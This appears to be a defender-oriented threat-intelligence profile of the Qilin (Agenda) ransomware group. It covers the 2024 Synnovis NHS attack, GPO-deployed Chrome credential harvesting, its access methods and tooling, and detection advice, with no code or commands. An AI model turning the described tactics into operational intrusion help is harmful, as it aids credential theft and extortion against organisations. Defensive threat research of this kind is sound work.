Qilin

Background

Qilin, also known as Agenda, is a Russian-speaking ransomware-as-a-service operation that emerged in mid-2022. The group develops ransomware in both Rust and Go, targeting Windows and Linux/VMware ESXi systems. Qilin has steadily grown in prominence and was responsible for one of 2024''s most impactful healthcare attacks.

Notable Campaigns

NHS Synnovis Attack (June 2024) — Qilin attacked Synnovis, a pathology services provider for major London NHS hospitals including King''s College Hospital and Guy''s and St Thomas''. The attack disrupted blood transfusion services and forced cancellation of thousands of medical appointments and surgeries, representing one of the most impactful healthcare ransomware incidents in UK history.

Chrome Credential Harvesting (2024) — Sophos documented Qilin affiliates deploying a novel technique: using Group Policy to push a script that harvested saved credentials from Google Chrome browsers across all machines in the domain before encrypting systems, dramatically expanding the impact of each intrusion.

Tactics, Techniques & Procedures

Qilin affiliates gain access through compromised VPN credentials (often lacking MFA), phishing, and exploitation of internet-facing applications. The group uses Cobalt Strike for post-exploitation and deploys SystemBC for SOCKS5 proxy tunneling.

A distinctive innovation is the Chrome credential harvesting technique — deploying scripts via Group Policy that extract saved passwords from all domain-joined machines, collecting credentials for SaaS applications, banking, and email that extend impact far beyond the encrypted network.

Tools & Malware

Qilin Ransomware — Cross-platform encryptor written in Rust (Windows) and Go (Linux). Targets VMware ESXi virtual infrastructure and supports configurable encryption parameters.

Chrome Credential Harvester — PowerShell script deployed via GPO that extracts saved credentials from Chrome''s SQLite database across all domain computers.

Indicators & Detection

Implement MFA on all VPN and remote access points. Monitor for Group Policy modifications deploying scripts to workstations, particularly those accessing Chrome user data directories. Watch for SystemBC proxy tunneling and Rclone data exfiltration.